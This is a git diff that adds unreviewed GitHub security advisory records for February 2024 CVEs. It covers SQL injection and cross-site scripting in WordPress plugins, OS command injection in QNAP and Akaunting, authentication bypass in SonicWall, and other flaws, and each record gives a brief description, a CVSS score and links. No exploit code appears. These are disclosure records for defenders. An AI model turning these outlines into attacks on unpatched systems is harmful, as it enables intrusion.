b/advisories/unreviewed/2024/02/GHSA-4xm5-m6gw-q5w5/GHSA-4xm5-m6gw-q5w5.json new file mode 100644 index 0000000000000..be3906f64720a --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4xm5-m6gw-q5w5/GHSA-4xm5-m6gw-q5w5.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4xm5-m6gw-q5w5", + "modified": "2024-02-07T18:30:27Z", + "published": "2024-02-02T06:30:31Z", + "aliases": [ + "CVE-2024-0685" + ], + "details": "The Ninja Forms Contact Form – The Drag and Drop Form Builder for WordPress plugin for WordPress is vulnerable to Second Order SQL Injection via the email address value submitted through forms in all versions up to, and including, 3.7.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to inject SQL in their email address that will append additional into the already existing query when an administrator triggers a personal data export.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0685" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3028929/ninja-forms/trunk/includes/Admin/UserDataRequests.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3cb73d5d-ca4a-4103-866d-f7bb369a8ce4?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T05:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-5233-h8c5-6rmx/GHSA-5233-h8c5-6rmx.json b/advisories/unreviewed/2024/02/GHSA-5233-h8c5-6rmx/GHSA-5233-h8c5-6rmx.json new file mode 100644 index 0000000000000..2cf531713084a --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-5233-h8c5-6rmx/GHSA-5233-h8c5-6rmx.json 
@@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5233-h8c5-6rmx", + "modified": "2024-02-06T00:30:26Z", + "published": "2024-02-06T00:30:26Z", + "aliases": [ + "CVE-2023-6884" + ], + "details": "This plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode in all versions up to, and including, 3.1 due to insufficient input sanitization and output escaping on the 'place_id' attribute. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6884" + }, + { + "type": "WEB", + "url": "https://advisory.abay.sh/cve-2023-6884" + }, + { + "type": "WEB", + "url": "https://plugins.svn.wordpress.org/widget-google-reviews/tags/3.1/includes/class-feed-shortcode.php" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3018964%40widget-google-reviews&new=3018964%40widget-google-reviews&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a8971d54-b54e-4e62-9db2-fa87d2564599?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-52rw-98p2-v2g3/GHSA-52rw-98p2-v2g3.json b/advisories/unreviewed/2024/02/GHSA-52rw-98p2-v2g3/GHSA-52rw-98p2-v2g3.json new file mode 100644 index 0000000000000..24b3a7cee0f6c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-52rw-98p2-v2g3/GHSA-52rw-98p2-v2g3.json 
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-52rw-98p2-v2g3",
+ "modified": "2024-02-01T12:30:23Z",
+ "published": "2024-02-01T12:30:23Z",
+ "aliases": [
+ "CVE-2023-51520"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPdevelop / Oplugins WP Booking Calendar allows Stored XSS.This issue affects WP Booking Calendar: from n/a before 9.7.4.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51520"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/booking/wordpress-booking-calendar-plugin-9-7-4-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T12:15:54Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-52vv-5jc5-5gmv/GHSA-52vv-5jc5-5gmv.json b/advisories/unreviewed/2024/02/GHSA-52vv-5jc5-5gmv/GHSA-52vv-5jc5-5gmv.json
new file mode 100644
index 0000000000000..5ba3abe3d30aa
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-52vv-5jc5-5gmv/GHSA-52vv-5jc5-5gmv.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-52vv-5jc5-5gmv",
+ "modified": "2024-02-06T06:30:31Z",
+ "published": "2024-02-06T06:30:31Z",
+ "aliases": [
+ "CVE-2023-43516"
+ ],
+ "details": "Memory corruption when malformed message payload is received from firmware.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43516"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T06:16:01Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-533p-5wv5-6gqg/GHSA-533p-5wv5-6gqg.json b/advisories/unreviewed/2024/02/GHSA-533p-5wv5-6gqg/GHSA-533p-5wv5-6gqg.json
new file mode 100644
index 0000000000000..60cdd84957ee2
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-533p-5wv5-6gqg/GHSA-533p-5wv5-6gqg.json
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-533p-5wv5-6gqg",
+ "modified": "2024-02-08T03:32:45Z",
+ "published": "2024-02-08T03:32:45Z",
+ "aliases": [
+ "CVE-2024-22394"
+ ],
+ "details": "An improper authentication vulnerability has been identified in SonicWall SonicOS SSL-VPN feature, which in specific conditions could allow a remote attacker to bypass authentication. \n\nThis issue affects only firmware version SonicOS 7.1.1-7040.\n\n",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22394"
+ },
+ {
+ "type": "WEB",
+ "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0003"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-287"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T02:15:07Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-548x-pj87-qv7f/GHSA-548x-pj87-qv7f.json b/advisories/unreviewed/2024/02/GHSA-548x-pj87-qv7f/GHSA-548x-pj87-qv7f.json
new file mode 100644
index 0000000000000..2f975024bd2bf
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-548x-pj87-qv7f/GHSA-548x-pj87-qv7f.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-548x-pj87-qv7f",
+ "modified": "2024-02-01T15:30:24Z",
+ "published": "2024-02-01T15:30:24Z",
+ "aliases": [
+ "CVE-2024-0935"
+ ],
+ "details": "An insertion of Sensitive Information into Log File vulnerability is affecting DELMIA Apriso Release 2019 through Release 2024",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0935"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.3ds.com/vulnerability/advisories"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-532"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T14:15:56Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-553x-x9jq-656c/GHSA-553x-x9jq-656c.json b/advisories/unreviewed/2024/02/GHSA-553x-x9jq-656c/GHSA-553x-x9jq-656c.json
new file mode 100644
index 0000000000000..375fc82101889
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-553x-x9jq-656c/GHSA-553x-x9jq-656c.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-553x-x9jq-656c",
+ "modified": "2024-02-07T00:30:25Z",
+ "published": "2024-02-07T00:30:25Z",
+ "aliases": [
+ "CVE-2023-45227"
+ ],
+ "details": "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nAn attacker with access to the web application with vulnerable software could introduce arbitrary JavaScript by injecting a cross-site scripting payload into the \"dns.0.server\" parameter.\n\n\n\n\n\n\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45227"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-023-04"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T22:16:14Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-55g3-3qvv-89r4/GHSA-55g3-3qvv-89r4.json b/advisories/unreviewed/2024/02/GHSA-55g3-3qvv-89r4/GHSA-55g3-3qvv-89r4.json
new file mode 100644
index 0000000000000..c1888239c6e67
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-55g3-3qvv-89r4/GHSA-55g3-3qvv-89r4.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-55g3-3qvv-89r4",
+ "modified": "2024-02-08T12:30:48Z",
+ "published": "2024-02-08T12:30:48Z",
+ "aliases": [
+ "CVE-2024-22464"
+ ],
+ "details": "\nDell EMC AppSync, versions from 4.2.0.0 to 4.6.0.0 including all Service Pack releases, contain an exposure of sensitive information vulnerability in AppSync server logs. A high privileged remote attacker could potentially exploit this vulnerability, leading to the disclosure of certain user credentials. The attacker may be able to use the exposed credentials to access the vulnerable system with privileges of the compromised account.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22464"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.dell.com/support/kbdoc/en-us/000221932/dsa-2024-072-security-update-for-dell-emc-appsync-for-vulnerabilities"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-532"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T10:15:14Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-55rf-79cf-hxgm/GHSA-55rf-79cf-hxgm.json b/advisories/unreviewed/2024/02/GHSA-55rf-79cf-hxgm/GHSA-55rf-79cf-hxgm.json
new file mode 100644
index 0000000000000..b29238b276e6e
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-55rf-79cf-hxgm/GHSA-55rf-79cf-hxgm.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-55rf-79cf-hxgm",
+ "modified": "2024-02-03T00:31:34Z",
+ "published": "2024-02-03T00:31:34Z",
+ "aliases": [
+ "CVE-2024-1197"
+ ],
+ "details": "A vulnerability, which was classified as critical, has been found in SourceCodester Testimonial Page Manager 1.0. This issue affects some unknown processing of the file delete-testimonial.php of the component HTTP GET Request Handler. The manipulation of the argument testimony leads to sql injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-252695.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1197"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252695"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252695"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-89"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T23:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-56w6-jjc5-f5mr/GHSA-56w6-jjc5-f5mr.json b/advisories/unreviewed/2024/02/GHSA-56w6-jjc5-f5mr/GHSA-56w6-jjc5-f5mr.json
new file mode 100644
index 0000000000000..6a33ac31f70d3
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-56w6-jjc5-f5mr/GHSA-56w6-jjc5-f5mr.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-56w6-jjc5-f5mr",
+ "modified": "2024-02-05T09:30:28Z",
+ "published": "2024-02-05T09:30:28Z",
+ "aliases": [
+ "CVE-2024-24858"
+ ],
+ "details": "A race condition was found in the Linux kernel's net/bluetooth in {conn,adv}_{min,max}_interval_set() function. This can result in I2cap connection or broadcast abnormality issue, possibly leading to denial of service.\n\n\n\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24858"
+ },
+ {
+ "type": "WEB",
+ "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=8154"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-362"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T08:15:44Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-57qm-6jgh-x438/GHSA-57qm-6jgh-x438.json b/advisories/unreviewed/2024/02/GHSA-57qm-6jgh-x438/GHSA-57qm-6jgh-x438.json
new file mode 100644
index 0000000000000..d57cd9e6b3ecc
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-57qm-6jgh-x438/GHSA-57qm-6jgh-x438.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-57qm-6jgh-x438",
+ "modified": "2024-02-02T00:31:27Z",
+ "published": "2024-02-02T00:31:27Z",
+ "aliases": [
+ "CVE-2023-49617"
+ ],
+ "details": "\n\n\n\n\nThe MachineSense application programmable interface (API) is improperly protected and can be accessed without authentication. A remote attacker could retrieve and modify sensitive information without any authentication.\n\n\n\n\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49617"
+ },
+ {
+ "type": "WEB",
+ "url": "https://machinesense.com/pages/about-machinesense"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-025-01"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-306"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T23:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-59h7-67hj-6ppf/GHSA-59h7-67hj-6ppf.json b/advisories/unreviewed/2024/02/GHSA-59h7-67hj-6ppf/GHSA-59h7-67hj-6ppf.json
new file mode 100644
index 0000000000000..f852545a10106
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-59h7-67hj-6ppf/GHSA-59h7-67hj-6ppf.json
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-59h7-67hj-6ppf",
+ "modified": "2024-02-02T06:30:31Z",
+ "published": "2024-02-02T06:30:31Z",
+ "aliases": [
+ "CVE-2024-24482"
+ ],
+ "details": "Aprktool before 2.9.3 on Windows allows ../ and /.. directory traversal.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/iBotPeaches/Apktool/security/advisories/GHSA-vgwr-4w3p-xmjv"
+ },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24482"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T05:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-5cmr-7rv7-358p/GHSA-5cmr-7rv7-358p.json b/advisories/unreviewed/2024/02/GHSA-5cmr-7rv7-358p/GHSA-5cmr-7rv7-358p.json
new file mode 100644
index 0000000000000..f301b2c500a7a
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-5cmr-7rv7-358p/GHSA-5cmr-7rv7-358p.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5cmr-7rv7-358p",
+ "modified": "2024-02-06T00:30:27Z",
+ "published": "2024-02-06T00:30:27Z",
+ "aliases": [
+ "CVE-2024-0372"
+ ],
+ "details": "The Views for WPForms – Display & Edit WPForms Entries on your site frontend plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'get_form_fields' function in all versions up to, and including, 3.2.2. This makes it possible for authenticated attackers, with subscriber access and above, to create form views.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0372"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2ab58add-ab81-4c84-b773-7daf382492b0?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:16:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-5fr5-frrw-m97p/GHSA-5fr5-frrw-m97p.json b/advisories/unreviewed/2024/02/GHSA-5fr5-frrw-m97p/GHSA-5fr5-frrw-m97p.json
new file mode 100644
index 0000000000000..c912c3596bcd0
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-5fr5-frrw-m97p/GHSA-5fr5-frrw-m97p.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5fr5-frrw-m97p",
+ "modified": "2024-02-06T12:30:31Z",
+ "published": "2024-02-06T12:30:31Z",
+ "aliases": [
+ "CVE-2024-24943"
+ ],
+ "details": "In JetBrains Toolbox App before 2.2 a DoS attack was possible via a malicious SVG image",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24943"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.jetbrains.com/privacy-security/issues-fixed/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-400"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T10:15:11Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-5g8q-6f25-m4g2/GHSA-5g8q-6f25-m4g2.json b/advisories/unreviewed/2024/02/GHSA-5g8q-6f25-m4g2/GHSA-5g8q-6f25-m4g2.json
new file mode 100644
index 0000000000000..e7b6e966ae6e5
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-5g8q-6f25-m4g2/GHSA-5g8q-6f25-m4g2.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5g8q-6f25-m4g2",
+ "modified": "2024-02-02T18:30:31Z",
+ "published": "2024-02-02T18:30:31Z",
+ "aliases": [
+ "CVE-2023-41283"
+ ],
+ "details": "An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute commands via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.4.2596 build 20231128 and later\nQuTS hero h5.1.4.2596 build 20231128 and later\nQuTScloud c5.1.5.2651 and later\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41283"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.qnap.com/en/security-advisory/qsa-23-53"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-77"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T16:15:49Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-5gvr-285q-pwc3/GHSA-5gvr-285q-pwc3.json b/advisories/unreviewed/2024/02/GHSA-5gvr-285q-pwc3/GHSA-5gvr-285q-pwc3.json
new file mode 100644
index 0000000000000..fd1aa22df95c0
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-5gvr-285q-pwc3/GHSA-5gvr-285q-pwc3.json
@@ -0,0 +1,50 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5gvr-285q-pwc3",
+ "modified": "2024-02-04T15:30:22Z",
+ "published": "2024-02-04T15:30:22Z",
+ "aliases": [
+ "CVE-2023-6240"
+ ],
+ "details": "A Marvin vulnerability side-channel leakage was found in the RSA decryption operation in the Linux Kernel. This issue may allow a network attacker to decrypt ciphertexts or forge signatures, limiting the services that use that private key.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6240"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/security/cve/CVE-2023-6240"
+ },
+ {
+ "type": "WEB",
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2250843"
+ },
+ {
+ "type": "WEB",
+ "url": "https://people.redhat.com/~hkario/marvin/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://securitypitfalls.wordpress.com/2023/10/16/experiment-with-side-channel-attacks-yourself/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-402"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-04T14:15:47Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-5h74-7w4c-g92x/GHSA-5h74-7w4c-g92x.json b/advisories/unreviewed/2024/02/GHSA-5h74-7w4c-g92x/GHSA-5h74-7w4c-g92x.json
new file mode 100644
index 0000000000000..22b88199edd7f
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-5h74-7w4c-g92x/GHSA-5h74-7w4c-g92x.json
@@ -0,0 +1,43 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5h74-7w4c-g92x",
+ "modified": "2024-02-08T21:30:38Z",
+ "published": "2024-02-08T21:30:38Z",
+ "aliases": [
+ "CVE-2024-22836"
+ ],
+ "details": "An OS command injection vulnerability exists in Akaunting v3.1.3 and earlier. An attacker can manipulate the company locale when installing an app to execute system commands on the hosting server.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22836"
+ },
+ {
+ "type": "WEB",
+ "url": "https://akaunting.com/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/akaunting/akaunting/releases/tag/3.1.4"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/u32i/cve/tree/main/CVE-2024-22836"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T20:15:52Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-5hg2-mhp5-c2q8/GHSA-5hg2-mhp5-c2q8.json b/advisories/unreviewed/2024/02/GHSA-5hg2-mhp5-c2q8/GHSA-5hg2-mhp5-c2q8.json
new file mode 100644
index 0000000000000..4e31b7fa6a517
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-5hg2-mhp5-c2q8/GHSA-5hg2-mhp5-c2q8.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5hg2-mhp5-c2q8",
+ "modified": "2024-02-03T03:30:27Z",
+ "published": "2024-02-03T03:30:27Z",
+ "aliases": [
+ "CVE-2023-31004"
+ ],
+ "details": "IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a remote attacker to gain access to the underlying system using man in the middle techniques. IBM X-Force ID: 254765.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-31004"
+ },
+ {
+ "type": "WEB",
+ "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/254765"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.ibm.com/support/pages/node/7106586"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-300"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-03T01:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-5j36-2f99-3384/GHSA-5j36-2f99-3384.json b/advisories/unreviewed/2024/02/GHSA-5j36-2f99-3384/GHSA-5j36-2f99-3384.json
new file mode 100644
index 0000000000000..45dca959ef70d
--- /dev/null
